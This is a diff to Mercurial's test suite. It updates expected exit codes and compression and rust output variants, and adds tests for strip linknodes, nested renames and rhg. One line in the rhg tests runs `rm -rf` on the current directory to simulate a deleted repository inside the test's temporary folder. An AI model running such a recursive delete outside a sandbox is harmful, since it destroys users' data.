$ hg init $TESTTMP/hidden-state1 $ cd $TESTTMP/hidden-state1 - $ cat >> .hg/hgrc <<EOF - > [experimental] - > rebaseskipobsolete=0 - > EOF $ hg debugdrawdag <<'EOS' > C > | - > D B # prune: B, C - > |/ # B/D=B + > D B # B/D=B + > |/ > A > EOS $ eval `hg tags -T '{tag}={node}\n'` $ rm .hg/localtags - $ hg update -q $C --hidden - updated to hidden changeset 7829726be4dc - (hidden revision '7829726be4dc' is pruned) + $ hg update -q $C $ hg rebase -s $B -d $D rebasing 1:2ec65233581b "B" merging D @@ -1790,12 +148,19 @@ unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') [240] + $ hg debugobsolete $B + 1 new obsolescence markers + obsoleted 1 changesets + 1 new orphan changesets + $ hg debugobsolete $C + 1 new obsolescence markers + obsoleted 1 changesets $ cp -R . $TESTTMP/hidden-state2 $ hg log -G @ 2:b18e25de2cf5 D | - | % 1:2ec65233581b B (pruned using prune) + | % 1:2ec65233581b B (pruned) |/ o 0:426bada5c675 A @@ -1818,14 +183,10 @@ (no more unresolved files) continue: hg rebase --continue $ hg rebase --continue - rebasing 1:2ec65233581b "B" - rebasing 3:7829726be4dc tip "C" + note: not rebasing 1:2ec65233581b "B", it has no successor + note: not rebasing 3:7829726be4dc tip "C", it has no successor $ hg log -G - @ 5:1964d5d5b547 C - | - o 4:68deb90c12a2 B - | - o 2:b18e25de2cf5 D + @ 2:b18e25de2cf5 D | o 0:426bada5c675 A @@ -1941,7 +302,7 @@ $ hg rebase --stop abort: cannot remove original changesets with unrebased descendants (either enable obsmarkers to allow unstable revisions or use --keep to keep original changesets) - [255] + [20] $ hg rebase --abort saved backup bundle to $TESTTMP/rbstop/.hg/strip-backup/b15528633407-6eb72b6f-backup.hg rebase aborted @@ -2020,7 +381,7 @@ [240] $ hg rebase --stop abort: cannot stop in --collapse session - [255] + [20] $ hg rebase --abort rebase aborted $ hg diff diff --git a/tests/test-rebase-parameters.t b/tests/test-rebase-parameters.t --- a/tests/test-rebase-parameters.t +++ 
b/tests/test-rebase-parameters.t @@ -66,7 +66,7 @@ $ hg rebase --continue --collapse abort: cannot use collapse with continue or abort - [255] + [10] $ hg rebase --continue --dest 4 abort: cannot specify both --continue and --dest @@ -94,15 +94,15 @@ $ hg rebase --rev 'wdir()' --dest 6 abort: cannot rebase the working copy - [255] + [10] $ hg rebase --source 'wdir()' --dest 6 abort: cannot rebase the working copy - [255] + [10] $ hg rebase --source 1 --source 'wdir()' --dest 6 abort: cannot rebase the working copy - [255] + [10] $ hg rebase --source '1 & !1' --dest 8 empty "source" revision set - nothing to rebase @@ -508,11 +508,11 @@ $ hg rebase -i abort: interactive history editing is supported by the 'histedit' extension (see "hg --config extensions.histedit= help -e histedit") - [255] + [10] $ hg rebase --interactive abort: interactive history editing is supported by the 'histedit' extension (see "hg --config extensions.histedit= help -e histedit") - [255] + [10] $ cd .. diff --git a/tests/test-rebase-scenario-global.t b/tests/test-rebase-scenario-global.t --- a/tests/test-rebase-scenario-global.t +++ b/tests/test-rebase-scenario-global.t @@ -266,14 +266,14 @@ $ hg rebase -s 5 -d 6 abort: source and destination form a cycle - [255] + [10] G onto B - merge revision with both parents not in ancestors of target: $ hg rebase -s 6 -d 1 rebasing 6:eea13746799a "G" abort: cannot rebase 6:eea13746799a without moving at least one of its parents - [255] + [10] $ hg rebase --abort rebase aborted @@ -325,9 +325,8 @@ $ hg pull --config phases.publish=True -q -r 6 . 
# update phase of 6 $ hg rebase -d 0 -b 6 - abort: cannot rebase public changesets - (see 'hg help phases' for details) - [10] + nothing to rebase + [1] $ hg rebase -d 5 -b 6 abort: cannot rebase public changesets (see 'hg help phases' for details) diff --git a/tests/test-remotefilelog-bgprefetch.t b/tests/test-remotefilelog-bgprefetch.t --- a/tests/test-remotefilelog-bgprefetch.t +++ b/tests/test-remotefilelog-bgprefetch.t @@ -29,8 +29,10 @@ $ hgcloneshallow ssh://user@dummy/master shallow --noupdate streaming all changes - 2 files to transfer, 776 bytes of data - transferred 776 bytes in * seconds (*/sec) (glob) + 2 files to transfer, 776 bytes of data (no-zstd !) + transferred 776 bytes in * seconds (*/sec) (glob) (no-zstd !) + 2 files to transfer, 784 bytes of data (zstd !) + transferred 784 bytes in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found @@ -63,6 +65,7 @@ > EOF $ hg strip tip saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/6b4b6f66ef8c-b4b8bdaf-backup.hg (glob) + 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob) $ clearcache $ hg pull diff --git a/tests/test-remotefilelog-bundles.t b/tests/test-remotefilelog-bundles.t --- a/tests/test-remotefilelog-bundles.t +++ b/tests/test-remotefilelog-bundles.t @@ -26,12 +26,12 @@ $ hg strip -r 66ee28d0328c 1 files updated, 0 files merged, 0 files removed, 0 files unresolved saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/66ee28d0328c-3d7aafd1-backup.hg (glob) - 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob) + 2 files fetched over 2 fetches - (2 misses, 0.00% hit ratio) over *s (glob) $ hg unbundle .hg/strip-backup/66ee28d0328c-3d7aafd1-backup.hg adding changesets adding manifests adding file changes - added 2 changesets with 0 changes to 0 files + added 2 changesets with 2 changes to 1 files new changesets 66ee28d0328c:16db62c5946f (run 'hg update' to get a working copy) @@ -51,7 +51,7 @@ Pulling from a shallow 
bundle - $ hg strip -r 66ee28d0328c + $ hg strip -r 66ee28d0328c --config remotefilelog.strip.includefiles=none saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/66ee28d0328c-3d7aafd1-backup.hg (glob) $ hg pull -r 66ee28d0328c .hg/strip-backup/66ee28d0328c-3d7aafd1-backup.hg pulling from .hg/strip-backup/66ee28d0328c-3d7aafd1-backup.hg @@ -63,12 +63,13 @@ new changesets 66ee28d0328c (1 drafts) (run 'hg update' to get a working copy) -Pulling from a full bundle +Pulling from a full bundle, also testing that strip produces a full bundle by +default. $ hg strip -r 66ee28d0328c saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/66ee28d0328c-b6ee89e7-backup.hg (glob) - $ hg pull -r 66ee28d0328c ../fullbundle.hg - pulling from ../fullbundle.hg + $ hg pull -r 66ee28d0328c .hg/strip-backup/66ee28d0328c-b6ee89e7-backup.hg + pulling from .hg/strip-backup/66ee28d0328c-b6ee89e7-backup.hg searching for changes abort: cannot pull from full bundles (use `hg unbundle` instead) diff --git a/tests/test-remotefilelog-clone-tree.t b/tests/test-remotefilelog-clone-tree.t --- a/tests/test-remotefilelog-clone-tree.t +++ b/tests/test-remotefilelog-clone-tree.t @@ -30,6 +30,8 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -71,6 +73,8 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -91,8 +95,7 @@ # flakiness here $ hg clone --noupdate ssh://user@dummy/shallow full 2>/dev/null streaming all changes - remote: abort: Cannot clone from a shallow repo to a full repo. - [255] + [100] # getbundle full clone @@ -113,6 +116,8 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) 
revlogv1 sparserevlog store diff --git a/tests/test-remotefilelog-clone.t b/tests/test-remotefilelog-clone.t --- a/tests/test-remotefilelog-clone.t +++ b/tests/test-remotefilelog-clone.t @@ -27,6 +27,8 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -61,6 +63,8 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -85,9 +89,9 @@ $ TEMP_STDERR=full-clone-from-shallow.stderr.tmp $ hg clone --noupdate ssh://user@dummy/shallow full 2>$TEMP_STDERR streaming all changes + [100] + $ cat $TEMP_STDERR remote: abort: Cannot clone from a shallow repo to a full repo. - [255] - $ cat $TEMP_STDERR abort: pull failed on remote $ rm $TEMP_STDERR @@ -110,6 +114,8 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-remotefilelog-local.t b/tests/test-remotefilelog-local.t --- a/tests/test-remotefilelog-local.t +++ b/tests/test-remotefilelog-local.t @@ -116,7 +116,7 @@ $ hg strip -r . 
2 files updated, 0 files merged, 1 files removed, 0 files unresolved saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/19edf50f4de7-df3d0f74-backup.hg (glob) - 4 files fetched over 2 fetches - (4 misses, 0.00% hit ratio) over *s (glob) + 3 files fetched over 2 fetches - (3 misses, 0.00% hit ratio) over *s (glob) # unbundle @@ -133,13 +133,14 @@ adding changesets adding manifests adding file changes - added 1 changesets with 0 changes to 0 files + added 1 changesets with 3 changes to 3 files new changesets 19edf50f4de7 (1 drafts) (run 'hg update' to get a working copy) + 2 files fetched over 1 fetches - (2 misses, 0.00% hit ratio) over *s (glob) $ hg up 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - 4 files fetched over 1 fetches - (4 misses, 0.00% hit ratio) over *s (glob) + 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob) $ cat a a @@ -148,7 +149,7 @@ $ clearcache $ hg revert -r .~2 y z no changes needed to z - 2 files fetched over 2 fetches - (2 misses, 0.00% hit ratio) over *s (glob) + 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob) $ hg checkout -C -r . -q # explicit bundle should produce full bundle file @@ -159,7 +160,7 @@ $ cd .. $ hgcloneshallow ssh://user@dummy/master shallow2 -q - 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob) + 2 files fetched over 1 fetches - (2 misses, 0.00% hit ratio) over *s (glob) $ cd shallow2 $ hg unbundle ../local.bundle adding changesets diff --git a/tests/test-remotefilelog-log.t b/tests/test-remotefilelog-log.t --- a/tests/test-remotefilelog-log.t +++ b/tests/test-remotefilelog-log.t @@ -30,6 +30,8 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) 
revlogv1 sparserevlog store diff --git a/tests/test-remotefilelog-partial-shallow.t b/tests/test-remotefilelog-partial-shallow.t --- a/tests/test-remotefilelog-partial-shallow.t +++ b/tests/test-remotefilelog-partial-shallow.t @@ -18,8 +18,10 @@ $ hg clone --shallow ssh://user@dummy/master shallow --noupdate --config remotefilelog.includepattern=foo streaming all changes - 3 files to transfer, 336 bytes of data - transferred 336 bytes in * seconds (*/sec) (glob) + 3 files to transfer, 336 bytes of data (no-zstd !) + transferred 336 bytes in * seconds (* */sec) (glob) (no-zstd !) + 3 files to transfer, 338 bytes of data (zstd !) + transferred 338 bytes in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found $ cat >> shallow/.hg/hgrc <<EOF diff --git a/tests/test-remotefilelog-prefetch.t b/tests/test-remotefilelog-prefetch.t --- a/tests/test-remotefilelog-prefetch.t +++ b/tests/test-remotefilelog-prefetch.t @@ -22,8 +22,10 @@ $ hgcloneshallow ssh://user@dummy/master shallow --noupdate streaming all changes - 2 files to transfer, 528 bytes of data - transferred 528 bytes in * seconds (*/sec) (glob) + 2 files to transfer, 528 bytes of data (no-zstd !) + transferred 528 bytes in * seconds (* */sec) (glob) (no-zstd !) + 2 files to transfer, 532 bytes of data (zstd !) + transferred 532 bytes in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found $ cd shallow @@ -86,6 +88,7 @@ $ printf "[remotefilelog]\npullprefetch=bookmark()\n" >> .hg/hgrc $ hg strip tip saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/109c3a557a73-3f43405e-backup.hg (glob) + 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob) $ clearcache $ hg pull @@ -163,8 +166,10 @@ $ hgcloneshallow ssh://user@dummy/master shallow2 streaming all changes - 2 files to transfer, 528 bytes of data - transferred 528 bytes in * seconds * (glob) + 2 files to transfer, 528 bytes of data (no-zstd !) 
+ transferred 528 bytes in * seconds * (glob) (no-zstd !) + 2 files to transfer, 532 bytes of data (zstd !) + transferred 532 bytes in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found updating to branch default @@ -180,7 +185,7 @@ x: untracked file differs 3 files fetched over 1 fetches - (3 misses, 0.00% hit ratio) over * (glob) abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg revert --all # Test batch fetching of lookup files during hg status diff --git a/tests/test-remotefilelog-sparse.t b/tests/test-remotefilelog-sparse.t --- a/tests/test-remotefilelog-sparse.t +++ b/tests/test-remotefilelog-sparse.t @@ -22,8 +22,10 @@ $ hgcloneshallow ssh://user@dummy/master shallow --noupdate streaming all changes - 2 files to transfer, 527 bytes of data - transferred 527 bytes in 0.* seconds (*/sec) (glob) + 2 files to transfer, 527 bytes of data (no-zstd !) + transferred 527 bytes in * seconds (* */sec) (glob) (no-zstd !) + 2 files to transfer, 534 bytes of data (zstd !) + transferred 534 bytes in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found $ cd shallow @@ -48,6 +50,7 @@ $ printf "[remotefilelog]\npullprefetch=bookmark()\n" >> .hg/hgrc $ hg strip tip saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/876b1317060d-b2e91d8d-backup.hg (glob) + 2 files fetched over 2 fetches - (2 misses, 0.00% hit ratio) over *s (glob) $ hg debugsparse --delete z @@ -72,8 +75,10 @@ $ hgcloneshallow ssh://user@dummy/master shallow2 streaming all changes - 2 files to transfer, 527 bytes of data - transferred 527 bytes in 0.* seconds (*) (glob) + 2 files to transfer, 527 bytes of data (no-zstd !) + transferred 527 bytes in * seconds (*) (glob) (no-zstd !) + 2 files to transfer, 534 bytes of data (zstd !) + transferred 534 bytes in * seconds (* */sec) (glob) (zstd !) 
searching for changes no changes found updating to branch default diff --git a/tests/test-remotefilelog-strip.t b/tests/test-remotefilelog-strip.t new file mode 100644 --- /dev/null +++ b/tests/test-remotefilelog-strip.t @@ -0,0 +1,68 @@ +#require no-windows + + $ . "$TESTDIR/remotefilelog-library.sh" + + $ hg init master + $ cd master + $ cat >> .hg/hgrc <<EOF + > [remotefilelog] + > server=True + > EOF + $ echo x > x + $ hg commit -qAm x + + $ cd .. + + $ hgcloneshallow ssh://user@dummy/master shallow -q + 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob) + $ cd shallow + + $ cat >> $TESTTMP/get_file_linknode.py <<EOF + > from mercurial import node, registrar, scmutil + > cmdtable = {} + > command = registrar.command(cmdtable) + > @command(b'debug-file-linknode', [(b'r', b'rev', b'.', b'rev')], b'hg debug-file-linknode FILE') + > def debug_file_linknode(ui, repo, file, **opts): + > rflctx = scmutil.revsingle(repo.unfiltered(), opts['rev']).filectx(file) + > ui.status(b'%s\n' % node.hex(rflctx.ancestormap()[rflctx._filenode][2])) + > EOF + + $ cat >> .hg/hgrc <<EOF + > [ui] + > interactive=1 + > [extensions] + > strip= + > get_file_linknode=$TESTTMP/get_file_linknode.py + > [experimental] + > evolution=createmarkers,allowunstable + > EOF + $ echo a > a + $ hg commit -qAm msg1 + $ hg commit --amend 're:^$' -m msg2 + $ hg commit --amend 're:^$' -m msg3 + $ hg --hidden log -G -T '{rev} {node|short}' + @ 3 df91f74b871e + | + | x 2 70494d7ec5ef + |/ + | x 1 1e423846dde0 + |/ + o 0 b292c1e3311f + + $ hg debug-file-linknode -r 70494d a + df91f74b871e064c89afa1fe9e2f66afa2c125df + $ hg --hidden strip -r 1 3 + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved + saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/df91f74b871e-c94d67be-backup.hg + + $ hg --hidden log -G -T '{rev} {node|short}' + o 1 70494d7ec5ef + | + @ 0 b292c1e3311f + +Demonstrate that the linknode points to a commit that is actually in the repo +after the 
strip operation. Otherwise remotefilelog has to search every commit in +the repository looking for a valid linkrev every time it's queried, such as +during push. + $ hg debug-file-linknode -r 70494d a + 70494d7ec5ef6cd3cd6939a9fd2812f9956bf553 diff --git a/tests/test-remotefilelog-tags.t b/tests/test-remotefilelog-tags.t --- a/tests/test-remotefilelog-tags.t +++ b/tests/test-remotefilelog-tags.t @@ -18,8 +18,10 @@ $ hg clone --shallow ssh://user@dummy/master shallow --noupdate --config remotefilelog.excludepattern=.hgtags streaming all changes - 3 files to transfer, 662 bytes of data - transferred 662 bytes in * seconds (*/sec) (glob) + 3 files to transfer, 662 bytes of data (no-zstd !) + transferred 662 bytes in * seconds (* */sec) (glob) (no-zstd !) + 3 files to transfer, 665 bytes of data (zstd !) + transferred 665 bytes in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found $ cat >> shallow/.hg/hgrc <<EOF diff --git a/tests/test-rename-dir-merge.t b/tests/test-rename-dir-merge.t --- a/tests/test-rename-dir-merge.t +++ b/tests/test-rename-dir-merge.t @@ -110,7 +110,7 @@ $ hg merge 2 b/c: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ cat b/c target but it should succeed if the content matches @@ -294,3 +294,45 @@ M t/t R a/s R a/t + + $ cd .. + + +Test that files are moved to a new directory based on the path prefix that +matches the most. dir1/ below gets renamed to dir2/, and dir1/subdir1/ gets +renamed to dir2/subdir2/. We want dir1/subdir1/newfile to move to +dir2/subdir2/ (not to dir2/subdir1/ as we would infer based on just the rename +of dir1/ to dir2/). 
+ + $ hg init nested-renames + $ cd nested-renames + $ mkdir dir1 + $ echo a > dir1/file1 + $ echo b > dir1/file2 + $ mkdir dir1/subdir1 + $ echo c > dir1/subdir1/file3 + $ echo d > dir1/subdir1/file4 + $ hg ci -Aqm initial + $ hg mv dir1 dir2 + moving dir1/file1 to dir2/file1 + moving dir1/file2 to dir2/file2 + moving dir1/subdir1/file3 to dir2/subdir1/file3 + moving dir1/subdir1/file4 to dir2/subdir1/file4 + $ hg mv dir2/subdir1 dir2/subdir2 + moving dir2/subdir1/file3 to dir2/subdir2/file3 + moving dir2/subdir1/file4 to dir2/subdir2/file4 + $ hg ci -m 'move dir1/ to dir2/ and dir1/subdir1/ to dir2/subdir2/' + $ hg co 0 + 4 files updated, 0 files merged, 4 files removed, 0 files unresolved + $ echo e > dir1/subdir1/file5 + $ hg ci -Aqm 'add file in dir1/subdir1/' + $ hg merge 1 + 5 files updated, 0 files merged, 4 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg files + dir2/file1 + dir2/file2 + dir2/subdir2/file3 + dir2/subdir2/file4 + dir2/subdir2/file5 + $ cd .. diff --git a/tests/test-repo-compengines.t b/tests/test-repo-compengines.t --- a/tests/test-repo-compengines.t +++ b/tests/test-repo-compengines.t @@ -1,11 +1,19 @@ A new repository uses zlib storage, which doesn't need a requirement + $ cat << EOF >> $HGRCPATH + > [format] + > # stabilize test across variant + > revlog-compression=zlib + > EOF + + $ hg init default $ cd default $ cat .hg/requires dotencode fncache generaldelta + persistent-nodemap (rust !) revlogv1 sparserevlog store @@ -54,6 +62,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlogv1 sparserevlog store @@ -72,6 +81,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd revlogv1 sparserevlog @@ -175,6 +185,7 @@ exp-compression-none fncache generaldelta + persistent-nodemap (rust !)
revlogv1 sparserevlog store diff --git a/tests/test-requires.t b/tests/test-requires.t --- a/tests/test-requires.t +++ b/tests/test-requires.t @@ -5,7 +5,7 @@ $ hg commit -m test $ rm .hg/requires $ hg tip - abort: unknown version (2) in revlog 00changelog.i + abort: unknown version (65535) in revlog 00changelog.i [50] $ echo indoor-pool > .hg/requires $ hg tip @@ -53,6 +53,8 @@ featuresetup-test fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-resolve.t b/tests/test-resolve.t --- a/tests/test-resolve.t +++ b/tests/test-resolve.t @@ -153,15 +153,15 @@ $ hg up 0 abort: outstanding merge conflicts (use 'hg resolve' to resolve) - [255] + [20] $ hg merge 2 abort: outstanding merge conflicts (use 'hg resolve' to resolve) - [255] + [20] $ hg merge --force 2 abort: outstanding merge conflicts (use 'hg resolve' to resolve) - [255] + [20] set up conflict-free merge @@ -255,11 +255,13 @@ ancestor path: file1 (node 2ed2a3912a0b24502043eae84ee4b279c18b90dd) other path: file1 (node 6f4310b00b9a147241b071a60c28a650827fb03d) extra: ancestorlinknode = 99726c03216e233810a2564cbc0adfe395007eac + extra: merged = yes file: file2 (state "u") local path: file2 (hash cb99b709a1978bd205ab9dfd4c5aaa1fc91c7523, flags "") ancestor path: file2 (node 2ed2a3912a0b24502043eae84ee4b279c18b90dd) other path: file2 (node 6f4310b00b9a147241b071a60c28a650827fb03d) extra: ancestorlinknode = 99726c03216e233810a2564cbc0adfe395007eac + extra: merged = yes $ hg resolve -l R file1 U file2 @@ -271,7 +273,7 @@ { "commits": [{"label": "working copy", "name": "local", "node": "57653b9f834a4493f7240b0681efcb9ae7cab745"}, {"label": "merge rev", "name": "other", "node": "dc77451844e37f03f5c559e3b8529b2b48d381d1"}], "extras": [], - "files": [{"ancestor_node": "2ed2a3912a0b24502043eae84ee4b279c18b90dd", "ancestor_path": "file1", "extras": [{"key": "ancestorlinknode", "value": "99726c03216e233810a2564cbc0adfe395007eac"}], 
"local_flags": "", "local_key": "60b27f004e454aca81b0480209cce5081ec52390", "local_path": "file1", "other_node": "6f4310b00b9a147241b071a60c28a650827fb03d", "other_path": "file1", "path": "file1", "state": "r"}, {"ancestor_node": "2ed2a3912a0b24502043eae84ee4b279c18b90dd", "ancestor_path": "file2", "extras": [{"key": "ancestorlinknode", "value": "99726c03216e233810a2564cbc0adfe395007eac"}], "local_flags": "", "local_key": "cb99b709a1978bd205ab9dfd4c5aaa1fc91c7523", "local_path": "file2", "other_node": "6f4310b00b9a147241b071a60c28a650827fb03d", "other_path": "file2", "path": "file2", "state": "u"}] + "files": [{"ancestor_node": "2ed2a3912a0b24502043eae84ee4b279c18b90dd", "ancestor_path": "file1", "extras": [{"key": "ancestorlinknode", "value": "99726c03216e233810a2564cbc0adfe395007eac"}, {"key": "merged", "value": "yes"}], "local_flags": "", "local_key": "60b27f004e454aca81b0480209cce5081ec52390", "local_path": "file1", "other_node": "6f4310b00b9a147241b071a60c28a650827fb03d", "other_path": "file1", "path": "file1", "state": "r"}, {"ancestor_node": "2ed2a3912a0b24502043eae84ee4b279c18b90dd", "ancestor_path": "file2", "extras": [{"key": "ancestorlinknode", "value": "99726c03216e233810a2564cbc0adfe395007eac"}, {"key": "merged", "value": "yes"}], "local_flags": "", "local_key": "cb99b709a1978bd205ab9dfd4c5aaa1fc91c7523", "local_path": "file2", "other_node": "6f4310b00b9a147241b071a60c28a650827fb03d", "other_path": "file2", "path": "file2", "state": "u"}] } ] @@ -344,6 +346,24 @@ $ hg resolve -l R file1 R file2 +Test with :mergediff conflict markers + $ hg resolve --unmark + $ hg resolve --re-merge -t :mergediff file2 + merging file2 + warning: conflicts while merging file2! 
(edit, then use 'hg resolve --mark') + [1] + $ hg resolve -l + U file1 + U file2 + $ hg --config commands.resolve.mark-check=abort resolve -m + warning: the following files still have conflict markers: + file2 + abort: conflict markers detected + (use --all to mark anyway) + [20] + $ hg resolve -l + U file1 + U file2 Test option value 'warn' $ hg resolve --unmark $ hg resolve -l diff --git a/tests/test-revlog-raw.py b/tests/test-revlog-raw.py --- a/tests/test-revlog-raw.py +++ b/tests/test-revlog-raw.py @@ -51,10 +51,10 @@ def readprocessor(self, rawtext): # True: the returned text could be used to verify hash text = rawtext[len(_extheader) :].replace(b'i', b'1') - return text, True, {} + return text, True -def writeprocessor(self, text, sidedata): +def writeprocessor(self, text): # False: the returned rawtext shouldn't be used to verify hash rawtext = _extheader + text.replace(b'1', b'i') return rawtext, False @@ -147,6 +147,7 @@ b'flags': rlog.flags(r), b'deltabase': rlog.node(deltaparent), b'delta': rlog.revdiff(deltaparent, r), + b'sidedata': rlog.sidedata(r), } def deltaiter(self): @@ -159,10 +160,11 @@ deltabase = chunkdata[b'deltabase'] delta = chunkdata[b'delta'] flags = chunkdata[b'flags'] + sidedata = chunkdata[b'sidedata'] chain = node - yield (node, p1, p2, cs, deltabase, delta, flags) + yield (node, p1, p2, cs, deltabase, delta, flags, sidedata) def linkmap(lnode): return rlog.rev(lnode) @@ -293,7 +295,7 @@ # Verify text, rawtext, and rawsize if isext: - rawtext = writeprocessor(None, text, {})[0] + rawtext = writeprocessor(None, text)[0] else: rawtext = text if rlog.rawsize(rev) != len(rawtext): diff --git a/tests/test-revlog-v2.t b/tests/test-revlog-v2.t --- a/tests/test-revlog-v2.t +++ b/tests/test-revlog-v2.t @@ -22,8 +22,10 @@ $ cd empty-repo $ cat .hg/requires dotencode - exp-revlogv2.1 + exp-revlogv2.2 fncache + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) 
sparserevlog store diff --git a/tests/test-revlog.t b/tests/test-revlog.t --- a/tests/test-revlog.t +++ b/tests/test-revlog.t @@ -22,10 +22,10 @@ Unknown version is rejected >>> with open('.hg/store/00changelog.i', 'wb') as fh: - ... fh.write(b'\x00\x00\x00\x02') and None + ... fh.write(b'\x00\x00\xbe\xef') and None $ hg log - abort: unknown version (2) in revlog 00changelog.i + abort: unknown version (48879) in revlog 00changelog.i [50] $ cd .. diff --git a/tests/test-revset.t b/tests/test-revset.t --- a/tests/test-revset.t +++ b/tests/test-revset.t @@ -3108,3 +3108,18 @@ $ log 'expectsize(0:2, :2)' abort: revset size mismatch. expected between 0 and 2, got 3 [255] + +Test getting list of node from file + + $ hg log -r '0:2' -T '{node}\n' > some.nodes + $ hg log -r 'nodefromfile("some.nodes")' -T '{rev}\n' + 0 + 1 + 2 + $ hg log -r 'nodefromfile("missing-file")' -T '{rev}\n' + abort: cannot open nodes file "missing-file": $ENOENT$ + [255] + $ echo bad-node > bad.nodes + $ hg log -r 'nodefromfile("bad.nodes")' -T '{rev}\n' + $ echo abcdefabcdefabcdeabcdeabcdeabcdeabcdeabc > missing.nodes + diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -1,43 +1,50 @@ -#require rust +#require rhg -Define an rhg function that will only run if rhg exists - $ rhg() { - > if [ -f "$RUNTESTDIR/../rust/target/release/rhg" ]; then - > "$RUNTESTDIR/../rust/target/release/rhg" "$@" - > else - > echo "skipped: Cannot find rhg. Try to run cargo build in rust/rhg." 
- > exit 80 - > fi - > } + $ NO_FALLBACK="env RHG_ON_UNSUPPORTED=abort" Unimplemented command - $ rhg unimplemented-command - error: Found argument 'unimplemented-command' which wasn't expected, or isn't valid in this context + $ $NO_FALLBACK rhg unimplemented-command + unsupported feature: error: Found argument 'unimplemented-command' which wasn't expected, or isn't valid in this context USAGE: - rhg <SUBCOMMAND> + rhg [OPTIONS] <SUBCOMMAND> For more information try --help + + [252] + $ rhg unimplemented-command --config rhg.on-unsupported=abort-silent [252] Finding root - $ rhg root + $ $NO_FALLBACK rhg root abort: no repository found in '$TESTTMP' (.hg not found)! [255] $ hg init repository $ cd repository - $ rhg root + $ $NO_FALLBACK rhg root $TESTTMP/repository +Reading and setting configuration + $ echo "[ui]" >> $HGRCPATH + $ echo "username = user1" >> $HGRCPATH + $ $NO_FALLBACK rhg config ui.username + user1 + $ echo "[ui]" >> .hg/hgrc + $ echo "username = user2" >> .hg/hgrc + $ $NO_FALLBACK rhg config ui.username + user2 + $ $NO_FALLBACK rhg --config ui.username=user3 config ui.username + user3 + Unwritable file descriptor - $ rhg root > /dev/full + $ $NO_FALLBACK rhg root > /dev/full abort: No space left on device (os error 28) [255] Deleted repository $ rm -rf `pwd` - $ rhg root + $ $NO_FALLBACK rhg root abort: error getting current working directory: $ENOENT$ [255] @@ -52,7 +59,7 @@ > hg commit -m "commit $i" -q Listing tracked files from root - $ rhg files + $ $NO_FALLBACK rhg files file1 file2 file3 @@ -60,13 +67,13 @@ Listing tracked files from subdirectory $ mkdir -p path/to/directory $ cd path/to/directory - $ rhg files + $ $NO_FALLBACK rhg files ../../../file1 ../../../file2 ../../../file3 Listing tracked files through broken pipe - $ rhg files | head -n 1 + $ $NO_FALLBACK rhg files | head -n 1 ../../../file1 Debuging data in inline index @@ -79,20 +86,20 @@ > hg add file-$i > hg commit -m "Commit $i" -q > done - $ rhg debugdata -c 2 + $ 
